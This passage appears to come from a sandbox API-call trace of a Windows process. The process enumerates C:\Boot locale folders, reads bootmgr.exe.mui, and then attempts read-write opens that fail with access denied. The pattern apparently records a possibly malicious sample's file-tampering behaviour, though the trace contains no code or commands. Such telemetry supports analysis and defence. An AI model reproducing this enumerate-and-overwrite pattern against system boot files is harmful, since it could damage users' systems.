hHeap=0x20000) returned 1 [0069.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0069.986] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.986] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.986] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.986] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.986] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.986] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0069.987] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.987] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ade2b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0069.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0069.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.987] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0069.987] FindFirstFileExW (in: lpFileName="C:\\Boot\\fr-CA\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78450 [0070.007] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.007] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0070.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.007] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0070.007] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0070.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0070.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45f68 [0070.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0070.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0070.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0070.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0070.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0070.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0070.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0070.008] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.008] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.008] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.008] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0070.008] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0070.008] AreFileApisANSI () returned 1 [0070.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\fr-CA\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\fr-CA\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0070.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.008] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.008] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.008] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0070.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0070.009] AreFileApisANSI () returned 1 [0070.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.009] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53718 [0070.009] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x53718, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\fr-CA\\bootmgr.exe.mui") returned 30 [0070.009] CreateFileW (lpFileName="C:\\Boot\\fr-CA\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0070.009] GetFileType (hFile=0x41c) returned 0x1 [0070.009] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0070.009] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0070.009] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0070.010] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0070.010] CloseHandle (hObject=0x41c) returned 1 [0070.010] AreFileApisANSI () returned 1 [0070.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0070.010] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x533b8 [0070.010] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x883b0, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\fr-CA\\bootmgr.exe.mui") returned 30 [0070.010] CreateFileW (lpFileName="C:\\Boot\\fr-CA\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.010] GetLastError () returned 0x5 [0070.010] GetLastError () returned 0x5 [0070.010] SetLastError (dwErrCode=0x5) [0070.010] GetLastError () returned 0x5 [0070.010] SetLastError (dwErrCode=0x5) [0070.010] GetLastError () returned 0x5 [0070.010] SetLastError (dwErrCode=0x5) [0070.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0070.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0070.010] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0070.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.011] FindNextFileW (in: hFindFile=0x78450, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x69178, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓㕠\x01⺊Ā")) returned 0 [0070.011] FindClose (in: hFindFile=0x78450 | out: hFindFile=0x78450) returned 1 [0070.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0070.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0070.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0070.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0070.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0070.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45f68 | out: hHeap=0x20000) returned 1 [0070.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0070.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0070.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0070.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0070.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0070.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0070.011] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0070.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.011] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.011] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.011] AreFileApisANSI () returned 1 [0070.011] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\fr-FR", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\fr-FR", lpUsedDefaultChar=0x0) returned 14 [0070.012] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.012] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0070.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0070.012] AreFileApisANSI () returned 1 [0070.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x883b0 [0070.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x883b0, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\fr-FR") returned 14 [0070.012] CreateFileW (lpFileName="C:\\Boot\\fr-FR" (normalized: "c:\\boot\\fr-fr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.012] GetLastError () returned 0x5 [0070.012] GetLastError () returned 0x5 [0070.012] SetLastError (dwErrCode=0x5) [0070.012] GetLastError () returned 0x5 [0070.012] SetLastError (dwErrCode=0x5) [0070.012] GetLastError () returned 0x5 [0070.012] SetLastError (dwErrCode=0x5) [0070.012] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.012] AreFileApisANSI () returned 1 [0070.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0070.012] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x887e8 [0070.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x887e8, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\fr-FR") returned 14 [0070.013] CreateFileW (lpFileName="C:\\Boot\\fr-FR" (normalized: "c:\\boot\\fr-fr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0070.013] GetLastError () returned 0x5 [0070.013] GetLastError () returned 0x5 [0070.013] SetLastError (dwErrCode=0x5) [0070.013] GetLastError () returned 0x5 [0070.013] SetLastError (dwErrCode=0x5) [0070.013] GetLastError () returned 0x5 [0070.013] SetLastError (dwErrCode=0x5) [0070.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0070.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0070.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0070.013] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.013] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.013] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.013] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0070.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0070.013] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0070.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0070.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0070.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0070.013] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0070.013] FindFirstFileExW (in: lpFileName="C:\\Boot\\fr-FR\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x782d0 [0070.013] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ade2b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.013] FindNextFileW (in: hFindFile=0x782d0, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2096e751, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13558, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0070.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0070.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0070.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0070.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0070.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0070.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0070.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0070.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0070.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0070.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46358 [0070.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0070.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0070.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0070.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0070.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0070.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0070.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0070.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0070.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0070.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0070.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0070.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0070.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0070.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0070.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0070.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0070.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0070.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | 